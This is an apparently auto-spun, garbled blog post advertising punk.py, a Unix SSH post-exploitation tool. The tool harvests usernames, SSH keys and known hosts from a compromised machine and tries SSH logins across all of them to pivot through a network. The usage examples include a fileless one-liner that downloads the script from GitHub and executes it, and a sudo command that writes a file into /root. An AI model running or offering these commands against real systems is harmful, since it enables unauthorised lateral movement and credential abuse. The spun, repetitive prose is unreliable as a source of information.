Punk.Py - Unix Ssh Post-Exploitation Tool
Monday, September 23, 2019
Edit
Punk.Py - Unix Ssh Post-Exploitation Tool - Hi friends mederc, In the article that you read this time with the title Punk.Py - Unix Ssh Post-Exploitation Tool, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts
Article Bruteforce,
Article Offensive Security,
Article Parameter,
Article Penetration Testing,
Article Pentest Tool,
Article Pivoting,
Article Post Exploitation,
Article Post-Exploitation,
Article Punk.Py,
Article Python,
Article SSH,
Article Unix, we write this you can understand. Alright, happy reading.
Title : Punk.Py - Unix Ssh Post-Exploitation Tool
link : Punk.Py - Unix Ssh Post-Exploitation Tool
unix SSH post-exploitation 1337 tool
how it works
punk.py is a post-exploitation tool meant to assistance network pivoting from a compromised unix box. It collect usernames, ssh keys in addition to known hosts from a unix system, in addition to hence it tries to connect via ssh to all the combinations found. punk.py is wrote inwards lodge to function on criterion python2 in addition to python3 installations.
examples
criterion execution:
TODO
You are now reading the article Punk.Py - Unix Ssh Post-Exploitation Tool with the link address https://mederc.blogspot.com/2019/09/punkpy-unix-ssh-post-exploitation-tool.html
Title : Punk.Py - Unix Ssh Post-Exploitation Tool
link : Punk.Py - Unix Ssh Post-Exploitation Tool
Punk.Py - Unix Ssh Post-Exploitation Tool
unix SSH post-exploitation 1337 tool
how it works
punk.py is a post-exploitation tool meant to assistance network pivoting from a compromised unix box. It collect usernames, ssh keys in addition to known hosts from a unix system, in addition to hence it tries to connect via ssh to all the combinations found. punk.py is wrote inwards lodge to function on criterion python2 in addition to python3 installations.
examples
criterion execution:
$ ./punk.py
skip passwd checks in addition to role a custom abode path: $ ./punk.py --no-passwd --home /home/ldapusers/
execute commands alongside sudo: $ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
one-liner fileless ( alongside --no-passwd parameter ): $ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd
TODO
- improve mortal keys hunting including dsa keys
- Recursion
- SSH keys alongside password bruteforce
- Hashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )
Thus the article Punk.Py - Unix Ssh Post-Exploitation Tool
That's all the article Punk.Py - Unix Ssh Post-Exploitation Tool this time, hopefully can benefit you all. okay, see you in another article posting.
You are now reading the article Punk.Py - Unix Ssh Post-Exploitation Tool with the link address https://mederc.blogspot.com/2019/09/punkpy-unix-ssh-post-exploitation-tool.html